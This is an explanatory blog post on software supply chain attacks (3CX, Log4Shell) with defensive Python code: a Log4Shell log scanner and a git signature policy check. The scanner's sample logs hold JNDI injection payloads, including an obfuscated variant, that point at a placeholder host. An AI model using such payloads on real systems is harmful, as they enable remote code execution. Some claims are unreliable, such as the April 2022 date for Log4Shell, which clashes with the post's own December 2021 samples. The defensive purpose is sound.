With the recent news of 3CX supply chain attacks I think it’s important to understand what, exactly, a supply chain attack is, and how you and/or your organization can help to reduce the risk and impact of a supply chain attack.

What Is a Supply Chain?

It may seem rudimentary, but let’s define what we’re talking about when we say, “Supply Chain”. One example of a modern supply chain is in the production of automobiles. Tesla doesn’t manufacture all of the parts for their own vehicles. Some parts are manufactured by third-party companies and then sent to Tesla to be installed on their vehicles. This relationship is referred to as a “Supply Chain”.

Another example would be Apple computers. They don’t manufacture all of their own parts, but utilize third parties to manufacture things like batteries and processors for their phones and computers.

Essentially, a “Supply Chain” is the relationship between two or more parties to provide raw materials that are to be converted into finished products.

Software Supply Chains

Modern software development, like the production of automobiles, often involves the use of code that was written by someone else. In fact, this is a fundamental reason why software development has been able to evolve as quickly as it has. Many of the software applications that you use will likely take advantage of at least one software library that was written by someone other than the author of the application you’re using. Some libraries that you may have heard of include:

  • jQuery
  • React
  • Angular
  • Bootstrap

What is a Supply Chain Attack?

Let’s now talk about supply chain attacks. A supply chain attack occurs when a threat actor compromises an early piece of the supply chain (i.e. the “raw material”), which effectively poisons the later stages of the supply chain (i.e. the “finished product”). Keeping with our modern software development example, a threat actor may compromise a software library used by a number of other applications.

Log4j is a Java-based logging library used by a large number of software applications to assist with application logging. In April 2022, a Log4j vulnerability was found to be exploited by threat actors. This exploit, dubbed Log4Shell, allowed a threat actor to send a specially crafted request to web services using Log4j, which, due to a lack of input validation, could cause the system to execute arbitrary code. In this example, “Log4Shell” is a supply chain attack.
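As an added example (not part of the original post), here is a small detection routine a defender could run over web-server access logs to spot the kind of crafted request described above. The log lines are constructed for the demo, and the lookup hostnames are placeholders. It normalizes nested no-op lookups (such as `${lower:...}` wrappers and `${::-x}` default values) before matching, so a request that hides the literal `jndi` token from plain substring matching is still flagged.

```python
import re

# Constructed sample access-log lines for the demo (not real traffic).
SAMPLE_LOG = """\
10.0.0.5 - - [10/Dec/2021:10:00:01 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [10/Dec/2021:10:00:02 +0000] "GET /login HTTP/1.1" 200 1024 "-" "${jndi:ldap://lookup.invalid/a}"
10.0.0.9 - - [10/Dec/2021:10:00:03 +0000] "GET /api HTTP/1.1" 404 64 "-" "${${lower:j}ndi:rmi://lookup.invalid/b}"
10.0.0.12 - - [10/Dec/2021:10:00:04 +0000] "GET /search?q=${env:HOME} HTTP/1.1" 200 128 "-" "curl/7.8"
"""

# Lookup wrappers that leave the inner text meaningful but hide the literal
# "jndi" token from naive substring matching. The case change itself is not
# applied here because the final match is case-insensitive anyway.
_NOOP_WRAPPER = re.compile(r"\$\{(?:lower|upper):([^${}]*)\}", re.IGNORECASE)
# "${::-x}" is an empty lookup with default value "x"; it evaluates to "x".
_DEFAULT_VALUE = re.compile(r"\$\{::-([^${}]*)\}")
# What we actually want to find once the wrappers are peeled away.
_JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def normalize(text: str) -> str:
    """Repeatedly collapse nested no-op lookups until nothing changes."""
    prev = None
    while prev != text:
        prev = text
        text = _NOOP_WRAPPER.sub(lambda m: m.group(1), text)
        text = _DEFAULT_VALUE.sub(lambda m: m.group(1), text)
    return text


def is_jndi_lookup(text: str) -> bool:
    """True if the text contains a JNDI lookup after normalization."""
    return _JNDI.search(normalize(text)) is not None


def scan_log(log_text: str) -> list[tuple[int, str]]:
    """Return (line number, line) for every log line carrying a JNDI lookup."""
    hits = []
    for lineno, line in enumerate(log_text.splitlines(), start=1):
        if is_jndi_lookup(line):
            hits.append((lineno, line))
    return hits


if __name__ == "__main__":
    for lineno, line in scan_log(SAMPLE_LOG):
        print(f"line {lineno}: {line}")
```

Note that `${env:HOME}` on line 4 is a lookup but not a JNDI lookup, so it is deliberately not flagged; a detection that simply alerts on `${` would drown in false positives on any application that legitimately logs template strings.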

The 3CX supply chain attack is a rare example of a double software supply chain compromise. According to Mandiant researchers, the initial access vector was a tainted installer of the organization’s own software, X_TRADER, that was installed by an employee. This led to the threat actors gaining access to the organization’s build environments, allowing them to further inject malicious code into the X_TRADER application.

Preventing Supply Chain Attacks

Now that we understand what a supply chain attack is, let’s talk about how we can help to reduce the risk of them occurring.

Secure Code Signing

Ensure that you have adopted strong secure code signing policies for your developers. All code that lands in your code repositories should be signed with the details of the developer who committed the changes. This ensures a chain of custody that can’t be repudiated.
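One way to enforce that policy in a pre-merge check, as an added example rather than anything from the original post: ask git for each commit’s signature status and signing-key fingerprint, and reject anything that is not a good signature from an approved developer key. The commit SHAs, fingerprints and author names below are constructed; the `%G?` and `%GF` format placeholders are real git features (git 2.19 or later), and the `git_log_signatures` helper assumes you point it at a repository whose commits were signed with GPG or SSH keys that git can verify.

```python
import subprocess
from dataclasses import dataclass

# Meaning of git's %G? signature-status placeholder (from the git-log format docs).
SIGNATURE_STATUS = {
    "G": "good signature",
    "B": "bad signature",
    "U": "good signature, unknown validity",
    "X": "good signature that has expired",
    "Y": "good signature made by an expired key",
    "R": "good signature made by a revoked key",
    "E": "signature cannot be checked (missing key)",
    "N": "no signature",
}

# Constructed sample of the git command's output: SHA, status, key fingerprint, author.
# The SHAs, fingerprints and names are hypothetical.
SAMPLE_GIT_LOG = (
    "1111111111111111111111111111111111111111\tG\tAAAA1111BBBB2222CCCC3333DDDD4444EEEE5555\tAlice Dev\n"
    "2222222222222222222222222222222222222222\tN\t\tBob Dev\n"
    "3333333333333333333333333333333333333333\tG\t9999000099990000999900009999000099990000\tMallory\n"
    "4444444444444444444444444444444444444444\tE\t\tCarol Dev\n"
)

# Fingerprints of keys issued to approved developers (hypothetical allowlist).
TRUSTED_FINGERPRINTS = {"AAAA1111BBBB2222CCCC3333DDDD4444EEEE5555"}


@dataclass
class CommitSignature:
    sha: str
    status: str
    fingerprint: str
    author: str


def parse_git_log(output: str) -> list[CommitSignature]:
    """Parse tab-separated lines produced by --format=%H%x09%G?%x09%GF%x09%an."""
    commits = []
    for line in output.splitlines():
        if not line.strip():
            continue
        sha, status, fingerprint, author = line.split("\t", 3)
        commits.append(CommitSignature(sha, status, fingerprint, author))
    return commits


def policy_violations(commits: list[CommitSignature], trusted_fingerprints: set[str]) -> list[str]:
    """Return one message per commit that fails the signing policy (empty list = pass)."""
    problems = []
    for c in commits:
        if c.status != "G":
            reason = SIGNATURE_STATUS.get(c.status, f"unknown status {c.status!r}")
            problems.append(f"{c.sha[:12]} ({c.author}): {reason}")
        elif c.fingerprint not in trusted_fingerprints:
            # A valid signature from a key we never issued is still a policy failure.
            problems.append(f"{c.sha[:12]} ({c.author}): good signature but key "
                            f"{c.fingerprint} is not an approved developer key")
    return problems


def git_log_signatures(repo_path: str, rev_range: str = "origin/main..HEAD") -> list[CommitSignature]:
    """Collect the same fields from a real repository (requires git on PATH)."""
    result = subprocess.run(
        ["git", "-C", repo_path, "log", "--format=%H%x09%G?%x09%GF%x09%an", rev_range],
        capture_output=True, text=True, check=True,
    )
    return parse_git_log(result.stdout)


if __name__ == "__main__":
    for problem in policy_violations(parse_git_log(SAMPLE_GIT_LOG), TRUSTED_FINGERPRINTS):
        print("REJECT", problem)
```

Treating only `G` as acceptable is deliberate: a `U` (good signature, unknown validity) or `E` (key not available) result means the server could not tie the commit to a known developer, which is exactly the chain-of-custody gap the policy exists to close. The allowlist check on the fingerprint is what turns “signed by someone” into “signed by one of our developers”.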

Third-Party Risk Management

It’s very important that you understand the risks to your information that result from any third parties you may work with. This applies not only to businesses, but also to us as individuals. Regular third-party risk assessments can help you assess third-party risks and continuously maintain awareness of them.

Principle of Least Privilege

Maintain a principle of least privilege approach to access control. This means that developers and users should only have access to the services and applications that they need to perform their job, and nothing more.

Avoid Shadow IT

Shadow IT can be defined as the use of unapproved hardware or software within an organization. An employee setting up a web server on their local host is an example of Shadow IT. The employee may simply have wanted to test a website they developed, but they likely weren’t focused on securing the web server appropriately. Shadow IT is often targeted by threat actors because it usually exists with little to no security review.
